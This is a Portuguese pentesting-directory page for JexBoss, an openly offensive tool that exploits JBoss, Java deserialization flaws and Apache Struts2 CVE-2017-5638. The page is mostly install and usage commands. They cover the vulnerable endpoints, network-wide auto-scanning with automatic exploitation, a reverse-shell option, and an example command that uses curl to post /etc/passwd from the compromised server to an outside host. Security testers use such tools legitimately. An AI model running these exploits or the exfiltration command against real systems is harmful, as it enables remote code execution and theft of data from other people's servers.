Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
jexboss — JexBoss: Ferramenta de verificação e EXploração do Jboss (e vulnerabilidades de desserialização Java) | Kitploit
Ferramentas/GitHubGitHub/joaomatosf/jexboss
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubjoaomatosf/jexboss

jexboss

JexBoss: Ferramenta de verificação e EXploração do Jboss (e vulnerabilidades de desserialização Java)

Ver Repositório
2.5k64025há 9 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

JexBoss - JBoss (e outras Vulnerabilidades de Desserialização Java) ferramenta de verificação e exploração

JexBoss é uma ferramenta para testar e explorar vulnerabilidades no JBoss Application Server e outras plataformas Java, frameworks, aplicativos, etc.

Requisitos

  • Python >= 2.7.x
  • urllib3
  • ipaddress

Instalação no Linux\Mac

Para instalar a versão mais recente do JexBoss, utilize os seguintes comandos:

git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
pip install -r requires.txt
python jexboss.py -h
python jexboss.py -host http://target_host:8080

OU:

Baixe a versão mais recente em: https://github.com/joaomatosf/jexboss/archive/master.zip
unzip master.zip
cd jexboss-master
pip install -r requires.txt
python jexboss.py -h
python jexboss.py -host http://target_host:8080

Se você estiver usando CentOS com Python 2.6, instale o Python 2.7. Exemplo de instalação do Python 2.7 no CentOS usando Collections Software scl:

yum -y install centos-release-scl
yum -y install python27
scl enable python27 bash

Instalação no Windows

Se você estiver usando Windows, pode usar o Git Bash para executar o JexBoss. Siga os passos abaixo:

  • Baixe e instale o Python
  • Baixe e instale o Git for Windows
  • Após a instalação, execute o Git for Windows e digite os seguintes comandos:
    PATH=$PATH:C:\Python27\
    PATH=$PATH:C:\Python27\Scripts
    git clone https://github.com/joaomatosf/jexboss.git
    cd jexboss
    pip install -r requires.txt
    python jexboss.py -h
    python jexboss.py -host http://target_host:8080
    

Recursos

A ferramenta e os exploits foram desenvolvidos e testados para:

  • Versões do JBoss Application Server: 3, 4, 5 e 6.
  • Vulnerabilidades de Desserialização Java em múltiplos frameworks, plataformas e aplicações Java (ex.: Java Server Faces - JSF, Seam Framework, RMI over HTTP, Jenkins CLI RCE (CVE-2015-5317), Remote JMX (CVE-2016-3427, CVE-2016-8735), etc)

Os vetores de exploração são:

  • /admin-console
    • testado e funcionando nas versões 5 e 6 do JBoss
  • /jmx-console
    • testado e funcionando nas versões 4, 5 e 6 do JBoss
  • /web-console/Invoker
    • testado e funcionando nas versões 4, 5 e 6 do JBoss
  • /invoker/JMXInvokerServlet
    • testado e funcionando nas versões 4, 5 e 6 do JBoss
  • Desserialização de Aplicação
    • testado e funcionando contra múltiplas aplicações e plataformas Java, etc., através de parâmetros HTTP POST
  • Desserialização de Servlet
    • testado e funcionando contra múltiplas aplicações e plataformas Java, etc., através de servlets que processam objetos serializados (ex.: ao ver um "Invoker" em um link)
  • Apache Struts2 CVE-2017-5638
    • testado em aplicações Apache Struts 2
  • Outros

Vídeos

  • Explorando Vulnerabilidades de Desserialização Java (RCE) em Aplicações JSF/Seam via javax.faces.ViewState com JexBoss

Alt text

  • Explorando o JBoss Application Server com JexBoss

Alt text

  • Explorando Apache Struts2 (RCE) com Jexboss (CVE-2017-5638)

Alt text

Capturas de Tela

  • Exemplos de uso simples:
$ python jexboss.py

alt tag

  • Exemplo de modo autônomo contra o JBoss:
$ python jexboss.py -u http://192.168.0.26:8080

alt tag alt tag

  • Modos de uso:
$ python jexboss.py -h
  • Modo de varredura de rede:
$ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080 -results results.txt

alt tag

  • Modo de varredura de rede com auto-exploração:
$ python jexboss.py -mode auto-scan -A -network 192.168.0.0/24 -ports 8080 -results results.txt

alt tag

  • Resultados e recomendações:

alt tag

Reverse Shell (integração meterpreter)

Após explorar um servidor JBoss, você pode usar o próprio shell de comando do jexboss ou realizar uma conexão reversa usando o seguinte comando:

   jexremote=SEU_IP:SUA_PORTA

   Exemplo:
     Shell>jexremote=192.168.0.10:4444
  • Exemplo: alt tag

Ao explorar vulnerabilidades de desserialização Java (Desserialização de Aplicação, Desserialização de Servlet), as opções padrão são: fazer uma conexão de reverse shell ou enviar um comando para executar.

Exemplos de uso

  • Para Vulnerabilidades de Desserialização Java em um parâmetro HTTP personalizado e enviar um comando personalizado para ser executado no servidor explorado:
$ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name --cmd 'curl -d@/etc/passwd http://your_server'
  • Para Vulnerabilidades de Desserialização Java em um parâmetro HTTP personalizado e fazer uma reverse shell (isso pedirá o endereço IP e porta do host remoto):
$ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name
  • Para Vulnerabilidades de Desserialização Java em um Servlet (como Invoker):
$ python jexboss.py -u http://vulnerable_java_app/path --servlet-unserialize
  • Para Apache Struts 2 (CVE-2017-5638)
$ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2
  • Para Apache Struts 2 (CVE-2017-5638) com cookies para recursos autenticados
$ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2 --cookies "JSESSIONID=24517D9075136F202DCE20E9C89D424D"
  • Modo de varredura automática:
$ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080,80 -results report_auto_scan.log
  • Modo de varredura por arquivo:
$ python jexboss.py -mode file-scan -file host_list.txt -out report_file_scan.log
  • Mais Opções:
Baixar ferramenta